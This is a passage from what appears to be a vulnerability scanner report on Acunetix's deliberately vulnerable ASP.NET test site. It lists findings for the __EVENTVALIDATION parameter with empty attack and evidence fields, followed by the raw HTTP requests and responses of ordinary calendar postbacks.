style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1109 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,109 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8457&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgAAXGeMF9sIZGRkRMLgCMv2gs7j769VZ8J%2BLt2MUuA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLdhIX7CwLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJ2Do4ufFtNpxenP2aTfzcVjskHBU%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:48:23 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgAAXGeMF9sIZGRkRMLgCMv2gs7j769VZ8J+Lt2MUuA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLdhIX7CwLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJ2Do4ufFtNpxenP2aTfzcVjskHBU=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:White" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1089 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,089 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8311&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgCADDfSpNoIZGRkDS03NpirjroeLRfjdTq%2F%2B07AyE0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLdlaYPAuKJ2soFAv6Q%2FOMBAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAgKo4P6HCgKo4P6HCgKo4NLsCAKo4NLsCAKo4MYDAqjgxgMCjffQqAMCjffQqAMCjffEzwwCjffEzwwCjff44gUCjff44gUCjffsuQ0CjffsuQ0CjfeA3AYCjfeA3AYCjfe08w8Cjfe08w8CjfeolgcCjfeolgcCjffcKgKN99wqAo33sJINAo33sJINAo33pKkGAo33pKkGAuadt94JAuadt94JAuadq%2FUCAuadq%2FUCAuad34kKAuad34kKAuad86wDAuad86wDAuad58MMAuad58MMAuadm%2BYFAuadm%2BYFAuadj70NAuadj70NAuado9AGAuado9AGAuadl7kDAuadl7kDAuadi9wMAuadi9wMAvuklcUPAvuklcUPAvukiZgHAvukiZgHAvukvT8C%2B6S9PwL7pNHTCQL7pNHTCQL7pMX2AgL7pMX2AjVOJabk7RHK%2BmlCsaFGFpWvQsBR
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:00:10 GMT Content-Length: 12593
Response Body - size: 12,593 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgCADDfSpNoIZGRkDS03NpirjroeLRfjdTq/+07AyE0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLdlaYPAuKJ2soFAv6Q/OMBAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAgKo4P6HCgKo4P6HCgKo4NLsCAKo4NLsCAKo4MYDAqjgxgMCjffQqAMCjffQqAMCjffEzwwCjffEzwwCjff44gUCjff44gUCjffsuQ0CjffsuQ0CjfeA3AYCjfeA3AYCjfe08w8Cjfe08w8CjfeolgcCjfeolgcCjffcKgKN99wqAo33sJINAo33sJINAo33pKkGAo33pKkGAuadt94JAuadt94JAuadq/UCAuadq/UCAuad34kKAuad34kKAuad86wDAuad86wDAuad58MMAuad58MMAuadm+YFAuadm+YFAuadj70NAuadj70NAuado9AGAuado9AGAuadl7kDAuadl7kDAuadi9wMAuadi9wMAvuklcUPAvuklcUPAvukiZgHAvukiZgHAvukvT8C+6S9PwL7pNHTCQL7pNHTCQL7pMX2AgL7pMX2AjVOJabk7RHK+mlCsaFGFpWvQsBR" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:White" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was 